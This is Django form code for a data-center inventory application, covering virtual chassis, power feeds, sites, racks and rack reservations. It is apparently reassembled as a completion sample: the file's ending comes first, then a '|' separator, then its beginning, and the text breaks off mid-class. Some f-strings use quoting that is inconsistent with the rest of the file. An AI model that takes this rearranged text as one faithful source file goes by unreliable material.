site = DynamicModelChoiceField(
queryset=Site.objects.all(),
required=False,
query_params={
'region_id': '$region'
}
)
rack = DynamicModelChoiceField(
queryset=Rack.objects.all(),
required=False,
null_option='None',
display_field='display_name',
query_params={
'site_id': '$site'
}
)
members = DynamicModelMultipleChoiceField(
queryset=Device.objects.all(),
required=False,
display_field='display_name',
query_params={
'site_id': '$site',
'rack_id': '$rack',
}
)
initial_position = forms.IntegerField(
initial=1,
required=False,
help_text='Position of the first member device. Increases by one for each additional member.'
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = VirtualChassis
fields = [
'name', 'domain', 'region', 'site', 'rack', 'members', 'initial_position', 'tags',
]
def save(self, *args, **kwargs):
instance = super().save(*args, **kwargs)
# Assign VC members
if instance.pk:
initial_position = self.cleaned_data.get('initial_position') or 1
for i, member in enumerate(self.cleaned_data['members'], start=initial_position):
member.virtual_chassis = instance
member.vc_position = i
member.save()
return instance
class VirtualChassisForm(BootstrapMixin, CustomFieldModelForm):
master = forms.ModelChoiceField(
queryset=Device.objects.all(),
required=False,
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = VirtualChassis
fields = [
'name', 'domain', 'master', 'tags',
]
widgets = {
'master': SelectWithPK(),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['master'].queryset = Device.objects.filter(virtual_chassis=self.instance)
class BaseVCMemberFormSet(forms.BaseModelFormSet):
def clean(self):
super().clean()
# Check for duplicate VC position values
vc_position_list = []
for form in self.forms:
vc_position = form.cleaned_data.get('vc_position')
if vc_position:
if vc_position in vc_position_list:
error_msg = 'A virtual chassis member already exists in position {}.'.format(vc_position)
form.add_error('vc_position', error_msg)
vc_position_list.append(vc_position)
class DeviceVCMembershipForm(forms.ModelForm):
class Meta:
model = Device
fields = [
'vc_position', 'vc_priority',
]
labels = {
'vc_position': 'Position',
'vc_priority': 'Priority',
}
def __init__(self, validate_vc_position=False, *args, **kwargs):
super().__init__(*args, **kwargs)
# Require VC position (only required when the Device is a VirtualChassis member)
self.fields['vc_position'].required = True
# Validation of vc_position is optional. This is only required when adding a new member to an existing
# VirtualChassis. Otherwise, vc_position validation is handled by BaseVCMemberFormSet.
self.validate_vc_position = validate_vc_position
def clean_vc_position(self):
vc_position = self.cleaned_data['vc_position']
if self.validate_vc_position:
conflicting_members = Device.objects.filter(
virtual_chassis=self.instance.virtual_chassis,
vc_position=vc_position
)
if conflicting_members.exists():
raise forms.ValidationError(
'A virtual chassis member already exists in position {}.'.format(vc_position)
)
return vc_position
class VCMemberSelectForm(BootstrapMixin, forms.Form):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
required=False,
query_params={
'region_id': '$region'
}
)
rack = DynamicModelChoiceField(
queryset=Rack.objects.all(),
required=False,
null_option='None',
display_field='display_name',
query_params={
'site_id': '$site'
}
)
device = DynamicModelChoiceField(
queryset=Device.objects.all(),
display_field='display_name',
query_params={
'site_id': '$site',
'rack_id': '$rack',
'virtual_chassis_id': 'null',
}
)
def clean_device(self):
device = self.cleaned_data['device']
if device.virtual_chassis is not None:
raise forms.ValidationError(
f"Device {device} is already assigned to a virtual chassis."
)
return device
class VirtualChassisBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=VirtualChassis.objects.all(),
widget=forms.MultipleHiddenInput()
)
domain = forms.CharField(
max_length=30,
required=False
)
class Meta:
nullable_fields = ['domain']
class VirtualChassisCSVForm(CustomFieldModelCSVForm):
master = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name',
required=False,
help_text='Master device'
)
class Meta:
model = VirtualChassis
fields = VirtualChassis.csv_headers
class VirtualChassisFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = VirtualChassis
q = forms.CharField(
required=False,
label='Search'
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
tenant_group = DynamicModelMultipleChoiceField(
queryset=TenantGroup.objects.all(),
to_field_name='slug',
required=False,
null_option='None'
)
tenant = DynamicModelMultipleChoiceField(
queryset=Tenant.objects.all(),
to_field_name='slug',
required=False,
null_option='None',
query_params={
'group': '$tenant_group'
}
)
tag = TagFilterField(model)
#
# Power panels
#
class PowerPanelForm(BootstrapMixin, CustomFieldModelForm):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
query_params={
'region_id': '$region'
}
)
rack_group = DynamicModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
query_params={
'site_id': '$site'
}
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = PowerPanel
fields = [
'region', 'site', 'rack_group', 'name', 'tags',
]
class PowerPanelCSVForm(CustomFieldModelCSVForm):
site = CSVModelChoiceField(
queryset=Site.objects.all(),
to_field_name='name',
help_text='Name of parent site'
)
rack_group = CSVModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
to_field_name='name'
)
class Meta:
model = PowerPanel
fields = PowerPanel.csv_headers
def __init__(self, data=None, *args, **kwargs):
super().__init__(data, *args, **kwargs)
if data:
# Limit group queryset by assigned site
params = {f"site__{self.fields["site"].to_field_name}": data.get('site')}
self.fields['rack_group'].queryset = self.fields['rack_group'].queryset.filter(**params)
class PowerPanelBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=PowerPanel.objects.all(),
widget=forms.MultipleHiddenInput
)
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
required=False,
query_params={
'region_id': '$region'
}
)
rack_group = DynamicModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
query_params={
'site_id': '$site'
}
)
class Meta:
nullable_fields = ['rack_group']
class PowerPanelFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = PowerPanel
q = forms.CharField(
required=False,
label='Search'
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
rack_group_id = DynamicModelMultipleChoiceField(
queryset=RackGroup.objects.all(),
required=False,
label='Rack group (ID)',
null_option='None',
query_params={
'site': '$site'
}
)
tag = TagFilterField(model)
#
# Power feeds
#
class PowerFeedForm(BootstrapMixin, CustomFieldModelForm):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites__powerpanel': '$power_panel'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
required=False,
initial_params={
'powerpanel': '$power_panel'
},
query_params={
'region_id': '$region'
}
)
power_panel = DynamicModelChoiceField(
queryset=PowerPanel.objects.all(),
query_params={
'site_id': '$site'
}
)
rack = DynamicModelChoiceField(
queryset=Rack.objects.all(),
required=False,
display_field='display_name',
query_params={
'site_id': '$site'
}
)
comments = CommentField()
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = PowerFeed
fields = [
'region', 'site', 'power_panel', 'rack', 'name', 'status', 'type', 'supply', 'phase', 'voltage', 'amperage',
'max_utilization', 'comments', 'tags',
]
widgets = {
'status': StaticSelect2(),
'type': StaticSelect2(),
'supply': StaticSelect2(),
'phase': StaticSelect2(),
}
class PowerFeedCSVForm(CustomFieldModelCSVForm):
site = CSVModelChoiceField(
queryset=Site.objects.all(),
to_field_name='name',
help_text='Assigned site'
)
power_panel = CSVModelChoiceField(
queryset=PowerPanel.objects.all(),
to_field_name='name',
help_text='Upstream power panel'
)
rack_group = CSVModelChoiceField(
queryset=RackGroup.objects.all(),
to_field_name='name',
required=False,
help_text="Rack's group (if any)"
)
rack = CSVModelChoiceField(
queryset=Rack.objects.all(),
to_field_name='name',
required=False,
help_text='Rack'
)
status = CSVChoiceField(
choices=PowerFeedStatusChoices,
required=False,
help_text='Operational status'
)
type = CSVChoiceField(
choices=PowerFeedTypeChoices,
required=False,
help_text='Primary or redundant'
)
supply = CSVChoiceField(
choices=PowerFeedSupplyChoices,
required=False,
help_text='Supply type (AC/DC)'
)
phase = CSVChoiceField(
choices=PowerFeedPhaseChoices,
required=False,
help_text='Single or three-phase'
)
class Meta:
model = PowerFeed
fields = PowerFeed.csv_headers
def __init__(self, data=None, *args, **kwargs):
super().__init__(data, *args, **kwargs)
if data:
# Limit power_panel queryset by site
params = {f"site__{self.fields["site"].to_field_name}": data.get('site')}
self.fields['power_panel'].queryset = self.fields['power_panel'].queryset.filter(**params)
# Limit rack_group queryset by site
params = {f"site__{self.fields["site"].to_field_name}": data.get('site')}
self.fields['rack_group'].queryset = self.fields['rack_group'].queryset.filter(**params)
# Limit rack queryset by site and group
params = {
f"site__{self.fields["site"].to_field_name}": data.get('site'),
f"group__{self.fields["rack_group"].to_field_name}": data.get('rack_group'),
}
self.fields['rack'].queryset = self.fields['rack'].queryset.filter(**params)
class PowerFeedBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=PowerFeed.objects.all(),
widget=forms.MultipleHiddenInput
)
power_panel = DynamicModelChoiceField(
queryset=PowerPanel.objects.all(),
required=False
)
rack = DynamicModelChoiceField(
queryset=Rack.objects.all(),
required=False,
display_field='display_name'
)
status = forms.ChoiceField(
choices=add_blank_choice(PowerFeedStatusChoices),
required=False,
initial='',
widget=StaticSelect2()
)
type = forms.ChoiceField(
choices=add_blank_choice(PowerFeedTypeChoices),
required=False,
initial='',
widget=StaticSelect2()
)
supply = forms.ChoiceField(
choices=add_blank_choice(PowerFeedSupplyChoices),
required=False,
initial='',
widget=StaticSelect2()
)
phase = forms.ChoiceField(
choices=add_blank_choice(PowerFeedPhaseChoices),
required=False,
initial='',
widget=StaticSelect2()
)
voltage = forms.IntegerField(
required=False
)
amperage = forms.IntegerField(
required=False
)
max_utilization = forms.IntegerField(
required=False
)
comments = CommentField(
widget=SmallTextarea,
label='Comments'
)
class Meta:
nullable_fields = [
'rackgroup', 'comments',
]
class PowerFeedFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = PowerFeed
q = forms.CharField(
required=False,
label='Search'
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
power_panel_id = DynamicModelMultipleChoiceField(
queryset=PowerPanel.objects.all(),
required=False,
label='Power panel',
null_option='None',
query_params={
'site': '$site'
}
)
rack_id = DynamicModelMultipleChoiceField(
queryset=Rack.objects.all(),
required=False,
label='Rack',
null_option='None',
query_params={
'site': '$site'
}
)
status = forms.MultipleChoiceField(
choices=PowerFeedStatusChoices,
required=False,
widget=StaticSelect2Multiple()
)
type = forms.ChoiceField(
choices=add_blank_choice(PowerFeedTypeChoices),
required=False,
widget=StaticSelect2()
)
supply = forms.ChoiceField(
choices=add_blank_choice(PowerFeedSupplyChoices),
required=False,
widget=StaticSelect2()
)
phase = forms.ChoiceField(
choices=add_blank_choice(PowerFeedPhaseChoices),
required=False,
widget=StaticSelect2()
)
voltage = forms.IntegerField(
required=False
)
amperage = forms.IntegerField(
required=False
)
max_utilization = forms.IntegerField(
required=False
)
tag = TagFilterField(model)
| import re
from django import forms
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.contrib.postgres.forms.array import SimpleArrayField
from django.core.exceptions import ObjectDoesNotExist
from django.utils.safestring import mark_safe
from netaddr import EUI
from netaddr.core import AddrFormatError
from timezone_field import TimeZoneFormField
from circuits.models import Circuit, CircuitTermination, Provider
from extras.forms import (
AddRemoveTagsForm, CustomFieldBulkEditForm, CustomFieldModelCSVForm, CustomFieldFilterForm, CustomFieldModelForm,
LocalConfigContextFilterForm,
)
from extras.models import Tag
from ipam.constants import BGP_ASN_MAX, BGP_ASN_MIN
from ipam.models import IPAddress, VLAN
from tenancy.forms import TenancyFilterForm, TenancyForm
from tenancy.models import Tenant, TenantGroup
from utilities.forms import (
APISelect, APISelectMultiple, add_blank_choice, BootstrapMixin, BulkEditForm, BulkEditNullBooleanSelect,
ColorSelect, CommentField, CSVChoiceField, CSVContentTypeField, CSVModelChoiceField, CSVModelForm,
DynamicModelChoiceField, DynamicModelMultipleChoiceField, ExpandableNameField, form_from_model, JSONField,
NumericArrayField, SelectWithPK, SmallTextarea, SlugField, StaticSelect2, StaticSelect2Multiple, TagFilterField,
BOOLEAN_WITH_BLANK_CHOICES,
)
from virtualization.models import Cluster, ClusterGroup
from .choices import *
from .constants import *
from .models import (
Cable, DeviceBay, DeviceBayTemplate, ConsolePort, ConsolePortTemplate, ConsoleServerPort, ConsoleServerPortTemplate,
Device, DeviceRole, DeviceType, FrontPort, FrontPortTemplate, Interface, InterfaceTemplate, Manufacturer,
InventoryItem, Platform, PowerFeed, PowerOutlet, PowerOutletTemplate, PowerPanel, PowerPort, PowerPortTemplate,
Rack, RackGroup, RackReservation, RackRole, RearPort, RearPortTemplate, Region, Site, VirtualChassis,
)
DEVICE_BY_PK_RE = r'{\d+\}'
INTERFACE_MODE_HELP_TEXT = """
Access: One untagged VLAN<br />
Tagged: One untagged VLAN and/or one or more tagged VLANs<br />
Tagged (All): Implies all VLANs are available (w/optional untagged VLAN)
"""
def get_device_by_name_or_pk(name):
"""
Attempt to retrieve a device by either its name or primary key ('{pk}').
"""
if re.match(DEVICE_BY_PK_RE, name):
pk = name.strip('{}')
device = Device.objects.get(pk=pk)
else:
device = Device.objects.get(name=name)
return device
class DeviceComponentFilterForm(BootstrapMixin, forms.Form):
field_order = [
'q', 'region', 'site'
]
q = forms.CharField(
required=False,
label='Search'
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
device_id = DynamicModelMultipleChoiceField(
queryset=Device.objects.all(),
required=False,
label='Device',
query_params={
'site': '$site'
}
)
class InterfaceCommonForm(forms.Form):
def clean(self):
super().clean()
parent_field = 'device' if 'device' in self.cleaned_data else 'virtual_machine'
tagged_vlans = self.cleaned_data['tagged_vlans']
# Untagged interfaces cannot be assigned tagged VLANs
if self.cleaned_data['mode'] == InterfaceModeChoices.MODE_ACCESS and tagged_vlans:
raise forms.ValidationError({
'mode': "An access interface cannot have tagged VLANs assigned."
})
# Remove all tagged VLAN assignments from "tagged all" interfaces
elif self.cleaned_data['mode'] == InterfaceModeChoices.MODE_TAGGED_ALL:
self.cleaned_data['tagged_vlans'] = []
# Validate tagged VLANs; must be a global VLAN or in the same site
elif self.cleaned_data['mode'] == InterfaceModeChoices.MODE_TAGGED:
valid_sites = [None, self.cleaned_data[parent_field].site]
invalid_vlans = [str(v) for v in tagged_vlans if v.site not in valid_sites]
if invalid_vlans:
raise forms.ValidationError({
'tagged_vlans': f"The tagged VLANs ({', '.join(invalid_vlans)}) must belong to the same site as "
f"the interface's parent device/VM, or they must be global"
})
class ComponentForm(BootstrapMixin, forms.Form):
"""
Subclass this form when facilitating the creation of one or more device component or component templates based on
a name pattern.
"""
name_pattern = ExpandableNameField(
label='Name'
)
label_pattern = ExpandableNameField(
label='Label',
required=False,
help_text='Alphanumeric ranges are supported. (Must match the number of names being created.)'
)
def clean(self):
super().clean()
# Validate that the number of components being created from both the name_pattern and label_pattern are equal
if self.cleaned_data['label_pattern']:
name_pattern_count = len(self.cleaned_data['name_pattern'])
label_pattern_count = len(self.cleaned_data['label_pattern'])
if name_pattern_count != label_pattern_count:
raise forms.ValidationError({
'label_pattern': f'The provided name pattern will create {name_pattern_count} components, however '
f'{label_pattern_count} labels will be generated. These counts must match.'
}, code='label_pattern_mismatch')
#
# Fields
#
class MACAddressField(forms.Field):
widget = forms.CharField
default_error_messages = {
'invalid': 'MAC address must be in EUI-48 format',
}
def to_python(self, value):
value = super().to_python(value)
# Validate MAC address format
try:
value = EUI(value.strip())
except AddrFormatError:
raise forms.ValidationError(self.error_messages['invalid'], code='invalid')
return value
#
# Regions
#
class RegionForm(BootstrapMixin, forms.ModelForm):
parent = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False
)
slug = SlugField()
class Meta:
model = Region
fields = (
'parent', 'name', 'slug', 'description',
)
class RegionCSVForm(CSVModelForm):
parent = CSVModelChoiceField(
queryset=Region.objects.all(),
required=False,
to_field_name='name',
help_text='Name of parent region'
)
class Meta:
model = Region
fields = Region.csv_headers
class RegionFilterForm(BootstrapMixin, forms.Form):
model = Site
q = forms.CharField(
required=False,
label='Search'
)
#
# Sites
#
class SiteForm(BootstrapMixin, TenancyForm, CustomFieldModelForm):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False
)
slug = SlugField()
comments = CommentField()
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = Site
fields = [
'name', 'slug', 'status', 'region', 'tenant_group', 'tenant', 'facility', 'asn', 'time_zone', 'description',
'physical_address', 'shipping_address', 'latitude', 'longitude', 'contact_name', 'contact_phone',
'contact_email', 'comments', 'tags',
]
widgets = {
'physical_address': SmallTextarea(
attrs={
'rows': 3,
}
),
'shipping_address': SmallTextarea(
attrs={
'rows': 3,
}
),
'status': StaticSelect2(),
'time_zone': StaticSelect2(),
}
help_texts = {
'name': "Full name of the site",
'facility': "Data center provider and facility (e.g. Equinix NY7)",
'asn': "BGP autonomous system number",
'time_zone': "Local time zone",
'description': "Short description (will appear in sites list)",
'physical_address': "Physical location of the building (e.g. for GPS)",
'shipping_address': "If different from the physical address",
'latitude': "Latitude in decimal format (xx.yyyyyy)",
'longitude': "Longitude in decimal format (xx.yyyyyy)"
}
class SiteCSVForm(CustomFieldModelCSVForm):
status = CSVChoiceField(
choices=SiteStatusChoices,
required=False,
help_text='Operational status'
)
region = CSVModelChoiceField(
queryset=Region.objects.all(),
required=False,
to_field_name='name',
help_text='Assigned region'
)
tenant = CSVModelChoiceField(
queryset=Tenant.objects.all(),
required=False,
to_field_name='name',
help_text='Assigned tenant'
)
class Meta:
model = Site
fields = Site.csv_headers
help_texts = {
'time_zone': mark_safe(
'Time zone (<a href="https://en.wikipedia.org/wiki/List_of_tz_database_time_zones">available options</a>)'
)
}
class SiteBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=Site.objects.all(),
widget=forms.MultipleHiddenInput
)
status = forms.ChoiceField(
choices=add_blank_choice(SiteStatusChoices),
required=False,
initial='',
widget=StaticSelect2()
)
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False
)
tenant = DynamicModelChoiceField(
queryset=Tenant.objects.all(),
required=False
)
asn = forms.IntegerField(
min_value=BGP_ASN_MIN,
max_value=BGP_ASN_MAX,
required=False,
label='ASN'
)
description = forms.CharField(
max_length=100,
required=False
)
time_zone = TimeZoneFormField(
choices=add_blank_choice(TimeZoneFormField().choices),
required=False,
widget=StaticSelect2()
)
class Meta:
nullable_fields = [
'region', 'tenant', 'asn', 'description', 'time_zone',
]
class SiteFilterForm(BootstrapMixin, TenancyFilterForm, CustomFieldFilterForm):
model = Site
field_order = ['q', 'status', 'region', 'tenant_group', 'tenant']
q = forms.CharField(
required=False,
label='Search'
)
status = forms.MultipleChoiceField(
choices=SiteStatusChoices,
required=False,
widget=StaticSelect2Multiple()
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
tag = TagFilterField(model)
#
# Rack groups
#
class RackGroupForm(BootstrapMixin, forms.ModelForm):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
query_params={
'region_id': '$region'
}
)
parent = DynamicModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
query_params={
'site_id': '$site'
}
)
slug = SlugField()
class Meta:
model = RackGroup
fields = (
'region', 'site', 'parent', 'name', 'slug', 'description',
)
class RackGroupCSVForm(CSVModelForm):
site = CSVModelChoiceField(
queryset=Site.objects.all(),
to_field_name='name',
help_text='Assigned site'
)
parent = CSVModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
to_field_name='name',
help_text='Parent rack group',
error_messages={
'invalid_choice': 'Rack group not found.',
}
)
class Meta:
model = RackGroup
fields = RackGroup.csv_headers
class RackGroupFilterForm(BootstrapMixin, forms.Form):
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
parent = DynamicModelMultipleChoiceField(
queryset=RackGroup.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region',
'site': '$site',
}
)
#
# Rack roles
#
class RackRoleForm(BootstrapMixin, forms.ModelForm):
slug = SlugField()
class Meta:
model = RackRole
fields = [
'name', 'slug', 'color', 'description',
]
class RackRoleCSVForm(CSVModelForm):
slug = SlugField()
class Meta:
model = RackRole
fields = RackRole.csv_headers
help_texts = {
'color': mark_safe('RGB color in hexadecimal (e.g. <code>00ff00</code>)'),
}
#
# Racks
#
class RackForm(BootstrapMixin, TenancyForm, CustomFieldModelForm):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
query_params={
'region_id': '$region'
}
)
group = DynamicModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
query_params={
'site_id': '$site'
}
)
role = DynamicModelChoiceField(
queryset=RackRole.objects.all(),
required=False
)
comments = CommentField()
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = Rack
fields = [
'region', 'site', 'group', 'name', 'facility_id', 'tenant_group', 'tenant', 'status', 'role', 'serial',
'asset_tag', 'type', 'width', 'u_height', 'desc_units', 'outer_width', 'outer_depth', 'outer_unit',
'comments', 'tags',
]
help_texts = {
'site': "The site at which the rack exists",
'name': "Organizational rack name",
'facility_id': "The unique rack ID assigned by the facility",
'u_height': "Height in rack units",
}
widgets = {
'status': StaticSelect2(),
'type': StaticSelect2(),
'width': StaticSelect2(),
'outer_unit': StaticSelect2(),
}
class RackCSVForm(CustomFieldModelCSVForm):
site = CSVModelChoiceField(
queryset=Site.objects.all(),
to_field_name='name'
)
group = CSVModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
to_field_name='name'
)
tenant = CSVModelChoiceField(
queryset=Tenant.objects.all(),
required=False,
to_field_name='name',
help_text='Name of assigned tenant'
)
status = CSVChoiceField(
choices=RackStatusChoices,
required=False,
help_text='Operational status'
)
role = CSVModelChoiceField(
queryset=RackRole.objects.all(),
required=False,
to_field_name='name',
help_text='Name of assigned role'
)
type = CSVChoiceField(
choices=RackTypeChoices,
required=False,
help_text='Rack type'
)
width = forms.ChoiceField(
choices=RackWidthChoices,
help_text='Rail-to-rail width (in inches)'
)
outer_unit = CSVChoiceField(
choices=RackDimensionUnitChoices,
required=False,
help_text='Unit for outer dimensions'
)
class Meta:
model = Rack
fields = Rack.csv_headers
def __init__(self, data=None, *args, **kwargs):
super().__init__(data, *args, **kwargs)
if data:
# Limit group queryset by assigned site
params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
self.fields['group'].queryset = self.fields['group'].queryset.filter(**params)
class RackBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=Rack.objects.all(),
widget=forms.MultipleHiddenInput
)
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
required=False,
query_params={
'region_id': '$region'
}
)
group = DynamicModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
query_params={
'site_id': '$site'
}
)
tenant = DynamicModelChoiceField(
queryset=Tenant.objects.all(),
required=False
)
status = forms.ChoiceField(
choices=add_blank_choice(RackStatusChoices),
required=False,
initial='',
widget=StaticSelect2()
)
role = DynamicModelChoiceField(
queryset=RackRole.objects.all(),
required=False
)
serial = forms.CharField(
max_length=50,
required=False,
label='Serial Number'
)
asset_tag = forms.CharField(
max_length=50,
required=False
)
type = forms.ChoiceField(
choices=add_blank_choice(RackTypeChoices),
required=False,
widget=StaticSelect2()
)
width = forms.ChoiceField(
choices=add_blank_choice(RackWidthChoices),
required=False,
widget=StaticSelect2()
)
u_height = forms.IntegerField(
required=False,
label='Height (U)'
)
desc_units = forms.NullBooleanField(
required=False,
widget=BulkEditNullBooleanSelect,
label='Descending units'
)
outer_width = forms.IntegerField(
required=False,
min_value=1
)
outer_depth = forms.IntegerField(
required=False,
min_value=1
)
outer_unit = forms.ChoiceField(
choices=add_blank_choice(RackDimensionUnitChoices),
required=False,
widget=StaticSelect2()
)
comments = CommentField(
widget=SmallTextarea,
label='Comments'
)
class Meta:
nullable_fields = [
'group', 'tenant', 'role', 'serial', 'asset_tag', 'outer_width', 'outer_depth', 'outer_unit', 'comments',
]
class RackFilterForm(BootstrapMixin, TenancyFilterForm, CustomFieldFilterForm):
model = Rack
field_order = ['q', 'region', 'site', 'group_id', 'status', 'role', 'tenant_group', 'tenant']
q = forms.CharField(
required=False,
label='Search'
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
group_id = DynamicModelMultipleChoiceField(
queryset=RackGroup.objects.all(),
required=False,
label='Rack group',
null_option='None',
query_params={
'site': '$site'
}
)
status = forms.MultipleChoiceField(
choices=RackStatusChoices,
required=False,
widget=StaticSelect2Multiple()
)
type = forms.MultipleChoiceField(
choices=RackTypeChoices,
required=False,
widget=StaticSelect2Multiple()
)
width = forms.MultipleChoiceField(
choices=RackWidthChoices,
required=False,
widget=StaticSelect2Multiple()
)
role = DynamicModelMultipleChoiceField(
queryset=RackRole.objects.all(),
to_field_name='slug',
required=False,
null_option='None'
)
tag = TagFilterField(model)
#
# Rack elevations
#
class RackElevationFilterForm(RackFilterForm):
field_order = ['q', 'region', 'site', 'group_id', 'id', 'status', 'role', 'tenant_group', 'tenant']
id = DynamicModelMultipleChoiceField(
queryset=Rack.objects.all(),
label='Rack',
required=False,
display_field='display_name',
query_params={
'site': '$site',
'group_id': '$group_id',
}
)
#
# Rack reservations
#
class RackReservationForm(BootstrapMixin, TenancyForm, CustomFieldModelForm):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
required=False,
query_params={
'region_id': '$region'
}
)
rack_group = DynamicModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
query_params={
'site_id': '$site'
}
)
rack = DynamicModelChoiceField(
queryset=Rack.objects.all(),
display_field='display_name',
query_params={
'site_id': '$site',
'group_id': '$rack_group',
}
)
units = NumericArrayField(
base_field=forms.IntegerField(),
help_text="Comma-separated list of numeric unit IDs. A range may be specified using a hyphen."
)
user = forms.ModelChoiceField(
queryset=User.objects.order_by(
'username'
),
widget=StaticSelect2()
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = RackReservation
fields = [
'rack', 'units', 'user', 'tenant_group', 'tenant', 'description', 'tags',
]
class RackReservationCSVForm(CustomFieldModelCSVForm):
site = CSVModelChoiceField(
queryset=Site.objects.all(),
to_field_name='name',
help_text='Parent site'
)
rack_group = CSVModelChoiceField(
queryset=RackGroup.objects.all(),
to_field_name='name',
required=False,
help_text="Rack's group (if any)"
)
rack = CSVModelChoiceField(
queryset=Rack.objects.all(),
to_field_name='name',
help_text='Rack'
)
units = SimpleArrayField(
base_field=forms.IntegerField(),
required=True,
help_text='Comma-separated list of individual unit numbers'
)
tenant = CSVModelChoiceField(
queryset=Tenant.objects.all(),
required=False,
to_field_name='name',
help_text='Assigned tenant'
)
class Meta:
model = RackReservation
fields = ('site', 'rack_group', 'rack', 'units', 'tenant', 'description')
def __init__(self, data=None, *args, **kwargs):
super().__init__(data, *args, **kwargs)
if data:
# Limit rack_group queryset by assigned site
params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
self.fields['rack_group'].queryset = self.fields['rack_group'].queryset.filter(**params)
# Limit rack queryset by assigned site and group
params = {
f"site__{self.fields['site'].to_field_name}": data.get('site'),
f"group__{self.fields['rack_group'].to_field_name}": data.get('rack_group'),
}
self.fields['rack'].queryset = self.fields['rack'].queryset.filter(**params)
class RackReservationBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=RackReservation.objects.all(),
widget=forms.MultipleHiddenInput()
)
user = forms.ModelChoiceField(
queryset=User.objects.order_by(
'username'
),
required=False,
widget=StaticSelect2()
)
tenant = DynamicModelChoiceField(
queryset=Tenant.objects.all(),
required=False
)
description = forms.CharField(
max_length=100,
required=False
)
class Meta:
